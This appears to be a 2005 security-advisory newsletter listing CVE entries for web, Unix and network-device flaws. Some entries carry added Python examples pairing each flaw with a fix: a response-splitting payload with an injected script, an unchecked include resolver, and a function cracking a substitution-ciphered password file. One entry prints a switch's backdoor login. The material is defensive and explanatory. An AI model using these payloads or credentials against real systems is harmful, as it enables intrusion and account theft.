05.25.14 CVE: CAN-2005-2039
Platform: Unix
Title: NanoBlogger Arbitrary Command Execution
Description: NanoBlogger is a small weblog engine written in Bash for
the command line. NanoBlogger is affected by a vulnerability regarding
the execution of arbitrary commands. This issue is due to an input or
access validation failure within the "recent_entries" and
"master_archive" plugins. This reportedly leads to the execution of
arbitrary commands. The vendor has addressed this issue in NanoBlogger
version 3.2.2 and later; earlier versions are reported vulnerable.
Ref: http://www.securityfocus.com/bid/14006
______________________________________________________________________

05.25.15 CVE: CAN-2005-2040
Platform: Unix
Title: Heimdal TelnetD Remote Buffer Overflow
Description: Heimdal is a free implementation of the Kerberos 5
network authentication protocol. Heimdal telnetd is susceptible to a
remote buffer overflow vulnerability. This issue is due to a failure
of the application to properly bounds check user-supplied data prior
to copying it to an insufficiently sized memory buffer. This
vulnerability may be exploited by remote attackers to influence the
proper flow of execution of the application, resulting in
attacker-supplied machine code being executed in the context of the
affected network service.
Ref: http://www.pdc.kth.se/heimdal/advisory/2005-06-20/
______________________________________________________________________

05.25.16 CVE: Not Available
Platform: Unix
Title: Yaws Source Code Disclosure
Description: Yaws is an HTTP server. It is vulnerable to a disclosure
of source code issue due to insufficient sanitization of HTTP
requests. Yaws versions 1.55 and earlier are vulnerable.
Ref: http://www.sec-consult.com/181.html
______________________________________________________________________

05.25.17 CVE: CAN-2005-1266
Platform: Unix
Title: SpamAssassin Malformed Email Header Remote Denial of Service
Description: SpamAssassin is a mail filter designed to identify and
process spam. It is prone to a remote denial of service issue due to a
failure in the application to properly handle overly long email
headers. SpamAssassin versions 3.0.3 and earlier are affected.
Ref: http://www.securityfocus.com/bid/13978
______________________________________________________________________

05.25.18 CVE: Not Available
Platform: Cross Platform
Title: Slim Browser Dialog Box Origin Spoofing Vulnerability
Description: Slim Browser is reported to be vulnerable to a dialog box
origin spoofing issue. The issue presents itself when dialog boxes
from inactive windows appear in other active windows.
Ref: http://www.securityfocus.com/bid/14038
______________________________________________________________________

05.25.19 CVE: CAN-2005-0773
Platform: Cross Platform
Title: Veritas Backup Exec Remote Agent Authentication Buffer Overflow
Description: Veritas Backup Exec Remote Agent is affected by a
remotely exploitable buffer overflow issue when handling
authentication requests. This issue is due to a boundary condition
error that is exposed during authentication requests to the
application. Backup Exec for NetWare Servers version 9.1.1156 and
Backup Exec version 10.0 rev.5520 have been released to fix this
issue.
Ref: http://www.securityfocus.com/bid/14022
______________________________________________________________________

05.25.20 CVE: Not Available
Platform: Cross Platform
Title: Veritas Backup Exec Web Administration Console Remote Buffer
Overflow
Description: Veritas Backup Exec is a network enabled backup solution
from Veritas. It is reported to be vulnerable to a remote buffer
overflow issue due to improper boundary checks.
Ref: http://www.securityfocus.com/bid/14025
______________________________________________________________________

05.25.21 CVE: Not Available
Platform: Cross Platform
Title: Avant Browser Dialog Box Origin Spoofing
Description: Avant Browser is affected by a dialog box origin spoofing
vulnerability. Avant Browser versions 10.0 Build 029 and earlier are
known to be vulnerable.
Ref: http://www.securityfocus.com/bid/14012
______________________________________________________________________

05.25.22 CVE: Not Available
Platform: Cross Platform
Title: Tor Arbitrary Memory Information Disclosure
Description: Tor is an implementation of second generation Onion
Routing, a connection-oriented anonymizing communication service. Tor
is affected by an arbitrary memory information disclosure
vulnerability. Tor versions 0.0.9.9 and earlier are known to be
vulnerable.
Ref: http://archives.seul.org/or/announce/Jun-2005/msg00001.html
______________________________________________________________________

05.25.23 CVE: Not Available
Platform: Cross Platform
Title: Mozilla Firefox Dialog Box Origin Spoofing
Description: Mozilla Firefox browsers are prone to a dialog box origin
spoofing issue which can allow remote attackers to carry out phishing
style attacks. Mozilla Firefox versions 1.0.4 and earlier are
affected.
Ref: http://www.securityfocus.com/bid/14008
______________________________________________________________________

05.25.24 CVE: Not Available
Platform: Cross Platform
Title: Opera Web Browser Dialog Box Origin Spoofing Vulnerability
Description: Opera Web Browser is vulnerable to a dialog box origin
spoofing issue that may allow a malicious user to spoof an interface
of a trusted web site and carry out phishing style attacks. All
current versions of Opera Web Browser are vulnerable.
Ref: http://www.securityfocus.com/bid/14009/info
______________________________________________________________________

05.25.25 CVE: Not Available
Platform: Cross Platform
Title: iCab Web Browser Dialog Box Origin Spoofing Vulnerability
Description: iCab web browser is reported to be vulnerable to a dialog
box origin spoofing issue. The issue presents itself when dialog boxes
from inactive windows appear in other active windows. iCab version
2.9.8 is reported to be vulnerable.
Ref: http://www.securityfocus.com/bid/14010
______________________________________________________________________

05.25.26 CVE: CAN-2005-2006
Platform: Cross Platform
Title: JBoss Malformed HTTP Request Remote Information Disclosure
Description: JBoss is a Java application server. A request containing a
"%" character that the HTTP parser in the "org.jboss.web.WebServer"
class fails to handle correctly causes the server to disclose
information to the remote client. JBoss versions 4.0.2 and earlier are
affected.
Ref: http://www.securityfocus.com/bid/13985
______________________________________________________________________

05.25.27 CVE: Not Available
Platform: Cross Platform
Title: Bitrix Site Manager Remote File Include
Description: Bitrix Site Manager is a web-based content management
system. It is vulnerable to a remote file include issue due to
insufficient sanitization of user-supplied input when the
"_SERVER[DOCUMENT_ROOT]" parameter of the "start.php" script is used to
build an include path. Bitrix Site Manager versions 4.0.5 and earlier
are vulnerable.
Ref: http://www.securityfocus.com/bid/13965
______________________________________________________________________

05.25.28 CVE: CAN-2005-1475
Platform: Cross Platform
Title: Opera XMLHttpRequest Object Cross-Domain Access
Description: Opera Web Browser is prone to an issue that allows a
violation of the cross-domain security model. This issue arises due to
an access validation error affecting the "XMLHttpRequest" object: the
same-origin check is applied to the URL a script requests but not
re-applied to the target of a server-side redirect, so a redirect can
be used to read a response from another domain. Opera Web Browser
version 8.0 is affected.
Ref: http://www.securityfocus.com/bid/13970
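The redirect case above, as an added example that is not Opera's code or
part of the advisory: a same-origin check that looks only at the URL the
script asked for, beside one that is re-applied at every hop of the
redirect chain. The host names and the redirect table are constructed for
the illustration.

```python
from urllib.parse import urlsplit

# Constructed redirect table standing in for the servers' 3xx answers: a host
# the attacker controls answers a same-origin request with a redirect to a
# victim site in a different origin. Host names are made up for the example.
REDIRECTS = {
    "http://attacker.example/bounce": "http://bank.example/account",
}


def origin_of(url):
    """Reduce a URL to its (scheme, host, port) origin so two can be compared."""
    parts = urlsplit(url)
    default_port = {"http": 80, "https": 443}.get(parts.scheme)
    return (parts.scheme, parts.hostname, parts.port or default_port)


def follow(url, redirects=REDIRECTS, limit=10):
    """Yield every URL in the redirect chain, starting with the requested one."""
    for _ in range(limit + 1):
        yield url
        if url not in redirects:
            return
        url = redirects[url]


def final_target(url, redirects=REDIRECTS):
    """Where the request actually ends up after following redirects."""
    return list(follow(url, redirects))[-1]


def xhr_allowed_initial_only(page_url, url):
    """Flawed policy: compare only the URL the script asked for. A redirect
    issued by the attacker's own server is never looked at."""
    return origin_of(url) == origin_of(page_url)


def xhr_allowed_every_hop(page_url, url, redirects=REDIRECTS):
    """Correct policy: the requested URL and every redirect target must share
    the page's origin, otherwise the response must not be readable by script."""
    return all(origin_of(hop) == origin_of(page_url)
               for hop in follow(url, redirects))
```

With the table above, a page on attacker.example asking for its own
/bounce passes the initial-only check, yet the bytes it can read come from
bank.example; the per-hop check refuses the same request.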
______________________________________________________________________

05.25.29 CVE: CAN-2005-1669
Platform: Cross Platform
Title: Opera Cross-Site Scripting and Local File Disclosure
Description: Opera is affected by cross-site scripting and local file
disclosure issues. These issues are exposed when malformed
"javascript:" URIs are opened in a new window or frame. Opera version
8.0 is affected.
Ref: http://www.securityfocus.com/bid/13969/info
______________________________________________________________________

05.25.30 CVE: Not Available
Platform: Web Application
Title: DUclassmate Multiple SQL Injection Vulnerabilities
Description: DUclassmate is a classmates listing and friends search
web application. Insufficient sanitization of the "iPro" parameter of
the "edit.asp" script and the "iState" parameter of the "default.asp"
script exposes the application to SQL injection. DUclassmate version
1.2 is affected.
Ref: http://www.securityfocus.com/bid/14036
______________________________________________________________________

05.25.31 CVE: Not Available
Platform: Web Application
Title: DUpaypal Pro SQL Injection
Description: DUpaypal Pro is a professional Paypal-based E-Commerce
storefront. DUpaypal Pro is prone to multiple SQL injection
vulnerabilities. These issues are due to a failure in the application
to properly sanitize user-supplied input before using it in SQL
queries. These vulnerabilities could permit remote attackers to pass
malicious input to database queries, resulting in modification of
query logic or other attacks.
Ref: http://www.securityfocus.com/bid/14034
______________________________________________________________________

05.25.32 CVE: Not Available
Platform: Web Application
Title: DUamazon Pro Multiple SQL Injection Vulnerabilities
Description: DUamazon Pro is a web storefront for affiliates of
Amazon. DUamazon Pro is affected by multiple SQL injection
vulnerabilities. DUamazon Pro versions 3.1 and earlier are known to be
vulnerable.
Ref: http://www.securityfocus.com/bid/14033
______________________________________________________________________

05.25.33 CVE: CAN-2005-1525
Platform: Web Application
Title: RaXnet Cacti SQL Injection
Description: RaXnet Cacti is a complete front-end to the RRDTool.
Cacti is prone to multiple SQL injection vulnerabilities. These issues
are due to a failure in the application to properly sanitize
user-supplied input before using it in SQL queries. These issues could
permit remote attackers to pass malicious input to database queries,
resulting in modification of query logic and other attacks. Cacti
versions prior to 0.8.6e are affected by these vulnerabilities.
Ref: http://www.idefense.com/application/poi/display?id=267&type=vulnerabilities
______________________________________________________________________

05.25.34 CVE: Not Available
Platform: Web Application
Title: Moodle Unspecified Text Filtering Vulnerability
Description: Moodle is a PHP web application that provides training. A
malicious user with remote web access may craft an arbitrary text
sequence to trigger this vulnerability. This text sequence is said to
allow unauthorized access to the application. Moodle version 1.1.1 is
reported to be vulnerable.
Ref: http://www.securityfocus.com/bid/14018
______________________________________________________________________

05.25.35 CVE: CAN-2005-1526
Platform: Web Application
Title: RaXnet Cacti Config_Settings.PHP Remote File Include
Description: RaXnet Cacti is a front-end to RRDTool. It is affected by
a remote file include issue due to a failure of the application to
properly sanitize the "config[include_path]" parameter before the
"config_settings.php" script uses it to build an include path. RaXnet
Cacti versions 0.8.6d and earlier are affected.
Ref: http://www.securityfocus.com/bid/14028
______________________________________________________________________

05.25.36 CVE: CAN-2005-1524
Platform: Web Application
Title: RaXnet Cacti Remote File Include
Description: RaXnet Cacti is a front-end to the RRDTool. It is
vulnerable to a remote file include issue due to a failure of the
application to properly sanitize user-supplied input prior to using it
in a PHP "include()" function call in the "top_graph_header.php"
script. An attacker may leverage this issue to execute arbitrary
server-side script code on an affected computer with the privileges of
the Web server process. RaXnet Cacti versions earlier than 0.8.6e are
vulnerable.
Ref: http://www.cacti.net/release_notes_0_8_6e.php
______________________________________________________________________

05.25.37 CVE: CAN-2005-2028
Platform: Web Application
Title: MercuryBoard Index.PHP Remote SQL Injection
Description: MercuryBoard is a web-based message board application.
Insufficient sanitization of user-supplied input to the "index.php"
script exposes an SQL injection issue in the application. MercuryBoard
version 1.1.4 is affected.
Ref: http://www.securityfocus.com/bid/14015
______________________________________________________________________

05.25.38 CVE: Not Available
Platform: Web Application
Title: Moodle Teacher Privilege Escalation
Description: Moodle provides online web-based training. It is reported
to be vulnerable to a privilege escalation issue. The issue presents
itself when an authenticated "teacher" account is able to obtain
administrative access to the web application. Moodle versions 1.1.1
and earlier are reported to be vulnerable.
Ref: http://www.securityfocus.com/bid/14013
______________________________________________________________________

05.25.39 CVE: Not Available
Platform: Web Application
Title: i-Gallery Folder Argument Cross-Site Scripting
Description: i-Gallery is a web-based photo gallery application.
i-Gallery is affected by a cross-site scripting vulnerability in the
folder argument. i-Gallery versions 3.x and earlier are known to be
vulnerable.
Ref: http://www.securityfocus.com/bid/14002
______________________________________________________________________

05.25.40 CVE: CAN-2005-2037
Platform: Web Application
Title: Fortibus CMS SQL Injection
Description: Fortibus CMS is a content management system. It is prone
to multiple SQL injection vulnerabilities. These issues are due to a
failure in the application to properly sanitize user-supplied input
before using it in SQL queries. These vulnerabilities affect the
"logon.asp", "WeeklyNotesDisplay.asp" and the search page scripts of
the application. These issues could permit remote attackers to pass
malicious input to database queries, resulting in modification of
query logic and other attacks. Fortibus CMS 4.0 is vulnerable to these
issues.
Ref: http://www.securityfocus.com/bid/14004
______________________________________________________________________

05.25.41 CVE: Not Available
Platform: Web Application
Title: cPanel User Parameter Cross-Site Scripting
Description: cPanel is a web hosting control panel that allows a user
to manage their hosted account through a web-based interface. cPanel
is affected by a cross-site scripting vulnerability in the "user"
parameter that may allow a remote attacker to execute HTML or script
code in a user's browser. cPanel versions 9.1 and earlier are known to
be vulnerable.
Ref: http://www.securityfocus.com/bid/13996
______________________________________________________________________

05.25.42 CVE: CAN-2003-0557
Platform: Web Application
Title: LaGarde StoreFront Shopping Cart LOGIN.ASP SQL Injection
Description: StoreFront Shopping Cart is an e-commerce shopping cart
implemented in ASP. It is vulnerable to an SQL injection issue due to
insufficient sanitization of user-supplied data in the "login.asp"
script. A remote attacker could exploit this issue to obtain sensitive
information or modify data. StoreFront Shopping Cart version 5.0 is
vulnerable.
Ref: http://www.zone-h.org/en/advisories/read/id=2684/
______________________________________________________________________

05.25.43 CVE: CAN-2005-2014
Platform: Web Application
Title: paFaq Database Unauthorized Access
Description: paFaq is a FAQ and knowledge base system. Insufficient
access validation in the "backup.php" script exposes an issue by which
a remote unauthenticated user can invoke the script and retrieve a
complete backup of the application database. paFaq Beta version 4.0 is
affected.
Ref: http://www.securityfocus.com/bid/13999
______________________________________________________________________

05.25.44 CVE: Not Available
Platform: Web Application
Title: paFaq Question Cross-Site Scripting
Description: paFaq is a knowledge base system. It is vulnerable to a
cross-site scripting issue due to a failure in the application to
properly sanitize user-supplied input to the "id" parameter during a
"Question" action. An attacker may leverage this issue to steal
cookie-based authentication credentials or carry out other attacks.
All current versions of paFaq are vulnerable.
Ref: http://www.securityfocus.com/bid/14001/info
______________________________________________________________________

05.25.45 CVE: CAN-2005-2012
Platform: Web Application
Title: paFaq Administrator Username SQL Injection
Description: paFaq is a FAQ and knowledge base system. It is reported
to be vulnerable to an SQL injection issue due to improper
sanitization of user-supplied input to the "username" parameter. paFaq
version Beta 4 is reported to be vulnerable.
Ref: http://www.securityfocus.com/bid/14003
______________________________________________________________________

05.25.46 CVE: Not Available
Platform: Web Application
Title: i-Gallery Directory Traversal
Description: i-Gallery is a photo gallery web application. It is
vulnerable to a directory traversal issue because "../" sequences in a
user-supplied path parameter are not filtered before the path is used.
i-Gallery versions 3.x are vulnerable.
Ref: http://www.hat-squad.com/en/000169.html
______________________________________________________________________

05.25.47 CVE: Not Available
Platform: Web Application
Title: Contelligent Preview Privilege Escalation
Description: Contelligent is a web-based content management system. It
is reported to be vulnerable to a privilege escalation issue because
it allows an attacker with preview access to gain elevated access to
the system. Contelligent versions 9.0.15 and earlier are reported to
be vulnerable.
Ref: http://www.securityfocus.com/bid/13987
______________________________________________________________________

05.25.48 CVE: CAN-2005-2007
Platform: Web Application
Title: Trac Unauthorized File Upload/Download Vulnerability
Description: Edgewall Software Trac is a wiki and bug tracking system.
Insufficient sanitization of the "id" parameter exposes an
unauthorized file upload and download vulnerability. Trac versions
0.8.3 and earlier are affected.
Ref: http://www.securityfocus.com/bid/13990
______________________________________________________________________

05.25.49 CVE: CAN-2005-2009
Platform: Web Application
Title: Uapplication Ublog Reload Multiple SQL Injection
Vulnerabilities
Description: Ublog Reload is web log software. It is reported to be
vulnerable to multiple SQL injection issues due to improper
sanitization of user-supplied input. Ublog version 1.0.5 is reported
to be vulnerable.
Ref: http://www.securityfocus.com/bid/13991
______________________________________________________________________

05.25.50 CVE: CAN-2005-0925
Platform: Web Application
Title: Ublog Reload Trackback.ASP Cross-Site Scripting
Description: Ublog Reload is web log software. It is vulnerable to a
cross-site scripting issue due to insufficient sanitization of
user-supplied input to the "btitle" parameter of the "trackback.asp"
script. Uapplication Ublog Reload version 1.0.5 is vulnerable.
Ref: http://echo.or.id/adv/adv18-theday-2005.txt
______________________________________________________________________

05.25.51 CVE: Not Available
Platform: Web Application
Title: osCommerce Multiple HTTP Response Splitting Vulnerabilities
Description: osCommerce is an e-commerce suite. It is reported to be
vulnerable to multiple HTTP response splitting issues because
user-supplied input is written into HTTP response headers without
carriage return and line feed characters being removed or encoded.
osCommerce versions 2.2 ms2 and earlier are reported to be vulnerable.
Ref: http://www.securityfocus.com/bid/13979
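Response splitting as an added example, not osCommerce's code or part of
the advisory: a redirect handler that copies a user-supplied URL into the
Location header, the injected value that turns one response into two, a
small parser that counts responses the way a pipelining client or proxy
would, and the hardened handler. The host name and the payload are
constructed for the illustration.

```python
# Constructed attacker value for a redirect parameter: the CR/LF pair ends the
# legitimate Location header and the rest of the string is a complete second
# response. The host name and the script body are made up for the example.
SPLIT_PAYLOAD = (
    "http://shop.example/\r\n"
    "Content-Length: 0\r\n"
    "\r\n"
    "HTTP/1.1 200 OK\r\n"
    "Content-Type: text/html\r\n"
    "Content-Length: 25\r\n"
    "\r\n"
    "<script>alert(1)</script>"
)


def redirect_response_unchecked(target):
    """Builds a 302 by writing the user-supplied URL straight into the
    Location header; line breaks in the value become new header lines."""
    return ("HTTP/1.1 302 Found\r\n"
            "Location: " + target + "\r\n"
            "Content-Length: 0\r\n"
            "\r\n")


class HeaderInjection(ValueError):
    """Raised when a header value would contain a line break."""


def redirect_response_safe(target):
    """Same response, but a value containing CR or LF is refused outright
    (percent-encoding them before use is the other acceptable choice)."""
    if "\r" in target or "\n" in target:
        raise HeaderInjection("CR/LF in Location value")
    return redirect_response_unchecked(target)


def count_responses(raw):
    """Count HTTP messages in a stream the way a pipelining client or a caching
    proxy would: headers up to the blank line, then exactly Content-Length
    bytes of body, then expect the next status line."""
    count, pos = 0, 0
    while pos < len(raw):
        head_end = raw.find("\r\n\r\n", pos)
        if head_end < 0:
            break
        lines = raw[pos:head_end].split("\r\n")
        if not lines[0].startswith("HTTP/"):
            break
        body_len = 0
        for line in lines[1:]:
            name, _, value = line.partition(":")
            if name.strip().lower() == "content-length":
                body_len = int(value.strip())
        count += 1
        pos = head_end + 4 + body_len
    return count


def safe_rejects(target):
    """True when the hardened handler refuses the value."""
    try:
        redirect_response_safe(target)
    except HeaderInjection:
        return True
    return False
```

The second, attacker-authored response is what a proxy caches or a browser
renders for the next request on the same connection, which is how response
splitting turns into cache poisoning or cross-site scripting.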
______________________________________________________________________

05.25.52 CVE: Not Available
Platform: Web Application
Title: XAMPP Lang.PHP HTML Injection
Description: XAMPP is an easy to install Apache distribution
containing MySQL, PHP and Perl. XAMPP is prone to an HTML injection
vulnerability. This issue is due to a failure in the application to
properly sanitize user-supplied input before using it in dynamically
generated content. Attacker-supplied HTML and script code would be
executed in the context of the affected Web site, potentially allowing
for theft of cookie-based authentication credentials. This issue is
reported to affect the Linux distribution of XAMPP.
Ref: http://www.securityfocus.com/bid/13982
______________________________________________________________________

05.25.53 CVE: Not Available
Platform: Web Application
Title: XAMPP Lang.PHP Directory Traversal Vulnerability
Description: XAMPP is an easy to install Apache distribution
containing MySQL, PHP and Perl. XAMPP is prone to a directory
traversal vulnerability. This issue is due to a failure in the
application to properly sanitize user-supplied input to "lang.php"
before using it in an include() function call. Exploitation of this
vulnerability could lead to a loss of confidentiality and, because the
file is included rather than merely read, to execution of any PHP code
it contains. This issue is reported to affect the Linux distribution of
XAMPP.
Ref: http://www.securityfocus.com/bid/13983
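The include-path bugs in this issue share one shape: a request value is
concatenated into the argument of include(), so it can climb out of the
intended directory with "../" (this XAMPP lang.php entry, the i-Gallery
traversal), or, when the value overrides the base path itself (the Cacti
"config[include_path]" and Bitrix "_SERVER[DOCUMENT_ROOT]" entries, the
classic register_globals pattern), it can be a URL that PHP fetches and
executes. The following is an added example written for this bulletin,
not code from any of those projects: the unchecked resolution in Python
form beside a hardened resolver. The directory names are assumed.

```python
import posixpath as pp
from urllib.parse import urlsplit

# Assumed document root and include directory; both are made up for the
# example and stand in for the application's own configuration.
WEBROOT = "/var/www/app"
LANG_DIR = pp.join(WEBROOT, "lang")


def resolve_include_unchecked(user_value, base=LANG_DIR):
    """Mirrors include($base . '/' . $_GET['lang'] . '.php') with no checks.
    Two things go wrong: the value can climb out of $base with "../", and if
    $base itself comes from the request (register_globals overwriting a
    config array entry) it can be a URL, which PHP will happily fetch."""
    return base + "/" + user_value + ".php"


def as_c_string(path):
    """What a C-level open() sees: everything after the first NUL is gone.
    PHP before 5.3.4 behaved this way, which is why an appended '.php'
    suffix was no protection against a %00 in the request."""
    return path.split("\x00", 1)[0]


class IncludeRejected(ValueError):
    """Raised when a user-supplied include name is not acceptable."""


def resolve_include_safe(user_value, base=LANG_DIR):
    """Hardened form: the base directory is a constant, URL-like and absolute
    values are refused, NUL bytes are refused, and the normalized result must
    still lie inside the base directory. commonpath, not a string prefix
    test, so "../lang_evil" cannot pass merely because it starts with
    ".../lang"."""
    if "\x00" in user_value:
        raise IncludeRejected("NUL byte in include name")
    if urlsplit(user_value).scheme:
        raise IncludeRejected("URL-like include name")
    if pp.isabs(user_value):
        raise IncludeRejected("absolute include path")
    candidate = pp.normpath(pp.join(base, user_value + ".php"))
    if pp.commonpath([base, candidate]) != base:
        raise IncludeRejected("include path escapes " + base)
    return candidate


def is_accepted(user_value):
    """True when the hardened resolver accepts the value."""
    try:
        resolve_include_safe(user_value)
    except IncludeRejected:
        return False
    return True
```

Where the set of legitimate values is small, as it is for a language
selector, an explicit allowlist of names is simpler and stricter than any
path check and should be preferred; the resolver above is for the cases
where that is not possible.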
______________________________________________________________________

05.25.54 CVE: Not Available
Platform: Web Application
Title: ATutor Multiple Cross-Site Scripting Vulnerabilities
Description: ATutor is a web-based Learning Content Management System.
It is vulnerable to multiple cross-site scripting vulnerabilities due
to insufficient sanitization of user-supplied input. ATutor versions
1.4.3 and 1.5 RC1 are vulnerable.
Ref: http://lostmon.blogspot.com/
______________________________________________________________________

05.25.55 CVE: Not Available
Platform: Web Application
Title: Cool Cafe Chat LOGIN.ASP SQL Injection
Description: Cool Cafe Chat is a web-based chat application. Cool Cafe
Chat is affected by an SQL injection vulnerability. Cool Cafe Chat
versions 1.2.1 and earlier are known to be vulnerable.
Ref: http://exploitlabs.com/files/advisories/EXPL-A-2005-009-coolcafe.txt
______________________________________________________________________

05.25.56 CVE: Not Available
Platform: Web Application
Title: e107 Website System Multiple Input Validation and Information
Disclosure Vulnerabilities
Description: e107 Website System is a web-based content management
system implemented in PHP. e107 Website System is prone to multiple
input validation and information disclosure vulnerabilities. The
application is also vulnerable to several cross-site scripting and
HTML injection vulnerabilities. Refer to the advisory for further
details.
Ref: http://www.securityfocus.com/bid/13974
______________________________________________________________________

05.25.57 CVE: CAN-2005-2030
Platform: Web Application
Title: Ultimate PHP Board Weak Password Encryption
Description: Ultimate PHP Board (UPB) is affected by a weak password
encryption issue. The "users.dat" file contains user and password
information and is stored in a remotely accessible location. The
passwords in the file are not hashed but merely obfuscated with a
trivial substitution cipher, so anyone who can fetch the file can
recover them.
Ref: http://www.securityfocus.com/bid/13975
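Why a substitution cipher is no protection for a file an attacker can
download, as an added example that is not UPB's code (the board's actual
table and file layout are not given in the advisory, so both are assumed
here): one account whose password the attacker chose reveals the table for
every character it contains, and with it every other user's password. The
salted, iterated hash at the end is the usual alternative, shown for
contrast.

```python
import hashlib
import hmac
import os
import string

# Hypothetical substitution table standing in for whatever mapping the board
# used; the advisory only says the cipher is a trivial substitution. Any fixed
# character-for-character table behaves the same way under this attack.
_ALPHABET = string.ascii_lowercase + string.digits
_TABLE = str.maketrans(_ALPHABET, _ALPHABET[7:] + _ALPHABET[:7])
PROBE = _ALPHABET            # a password the attacker picks: every character once


def weak_encrypt(password):
    """The board's 'encryption': each character replaced by a fixed partner."""
    return password.translate(_TABLE)


# Constructed users.dat in an assumed "user:obfuscated-password" line format;
# the real file layout is not given in the advisory.
USERS_DAT = "\n".join([
    "admin:" + weak_encrypt("hunter2"),
    "bob:" + weak_encrypt("hunter2"),      # same password, same stored value
    "mallory:" + weak_encrypt(PROBE),      # the attacker's own account
])


def recover_table(known_plaintext, known_ciphertext):
    """Known-plaintext attack: one account whose password the attacker chose
    reveals the table entry for every character that password contains."""
    return {c: p for p, c in zip(known_plaintext, known_ciphertext)}


def crack_users_dat(users_dat, own_user, own_password):
    """Fetch the file, learn the table from the attacker's own entry, and
    read every other user's password off it."""
    entries = dict(line.split(":", 1) for line in users_dat.splitlines())
    table = recover_table(own_password, entries[own_user])
    return {user: "".join(table.get(ch, "?") for ch in enc)
            for user, enc in entries.items() if user != own_user}


# What the file should have held instead: a salted, iterated hash. There is
# no table to recover, and equal passwords no longer give equal stored values.
def hash_password(password, salt=None):
    salt = salt or os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)
    return salt.hex() + "$" + digest.hex()


def verify_password(password, stored):
    salt_hex, digest_hex = stored.split("$", 1)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(),
                                 bytes.fromhex(salt_hex), 100_000)
    return hmac.compare_digest(digest.hex(), digest_hex)
```

Even without registering an account the file leaks structure: two users
with identical stored values share a password, and the length of every
password is visible, neither of which holds for the hashed form.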
______________________________________________________________________

05.25.58 CVE: CAN-2005-2004
Platform: Web Application
Title: Ultimate PHP Board Multiple Cross-Site Scripting
Vulnerabilities
Description: Ultimate PHP Board (UPB) is an open source PHP Bulletin
Board. It is vulnerable to multiple cross-site scripting issues due to
a failure in the application to properly sanitize user-supplied input.
An attacker may leverage this issue to steal cookie-based
authentication credentials or carry out other attacks.
Ref: http://secunia.com/advisories/15732
______________________________________________________________________

05.25.59 CVE: CAN-2005-1769
Platform: Web Application
Title: SquirrelMail Multiple Unspecified Cross-Site Scripting
Vulnerabilities
Description: SquirrelMail is a web mail application. It is reported to
be vulnerable to multiple cross-site scripting issues due to improper
sanitization of user-supplied input. SquirrelMail 1.4.4 and earlier
versions are reported to be vulnerable.
Ref: http://www.securityfocus.com/bid/13973
______________________________________________________________________

05.25.60 CVE: Not Available
Platform: Network Device
Title: Enterasys Networks Vertical Horizon Default Backdoor Account
Vulnerability
Description: Enterasys Networks Vertical Horizon is a network switch
appliance. It has a backdoor administrative account with username
"tiger" and password "tiger123".
Ref: http://www.securityfocus.com/bid/14014
______________________________________________________________________

05.25.61 CVE: CAN-2005-2027
Platform: Network Device
Title: Enterasys Networks Vertical Horizon Remote Denial of Service
Description: Enterasys Networks Vertical Horizon is a network switch
appliance. It is vulnerable to a privilege escalation issue that
allows an attacker who connects to the administrative Telnet interface
as a guest to invoke administrative commands. Exploitation of this
issue allows a remote attacker to deny service to other legitimate
users connected to the switch. Enterasys Networks Vertical Horizon
VH-2402S versions 02.05.00 and 02.05.09.07 are vulnerable.
Ref: http://www.enterasys.com/support/relnotes/VH-2402S-2050908-patch-rel.pdf
______________________________________________________________________

05.25.62 CVE: CAN-2005-2025
Platform: Network Device
Title: Cisco VPN Concentrator Groupname Enumeration Weakness
Description: The VPN Concentrator is a hardware and firmware security
solution available from Cisco Systems. It is vulnerable to a remote
groupname enumeration weakness due to a design error that could assist
a remote attacker in enumerating groupnames and carrying out
brute-force attacks. Refer to the following link for a list of
vulnerable versions.
Ref: http://www.cisco.com/univercd/cc/td/doc/product/vpn/vpn3000/4_7/471con3k.htm#wp560292
______________________________________________________________________

(c) 2005. All rights reserved. The information contained in this
newsletter, including any external links, is provided "AS IS," with no
express or implied warranty, for informational purposes only. In some
cases, copyright for material in this newsletter may be held by a party
other than Qualys (as indicated herein) and permission to use such
material must be requested from the copyright owner.

==end==

Subscriptions: RISK is distributed free of charge to people responsible
for managing and securing information systems and networks. You may
forward this newsletter to others with such responsibility inside or
outside your organization.

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.1 (Darwin)

iD8DBQFCvCq1+LUG5KFpTkYRAqMpAJ9hW20UNpm0F6nQHc9IIizvNEta4QCgjGKh
/rkcY9/0BP6y3Up3QIAROvU=
=NqDR
-----END PGP SIGNATURE-----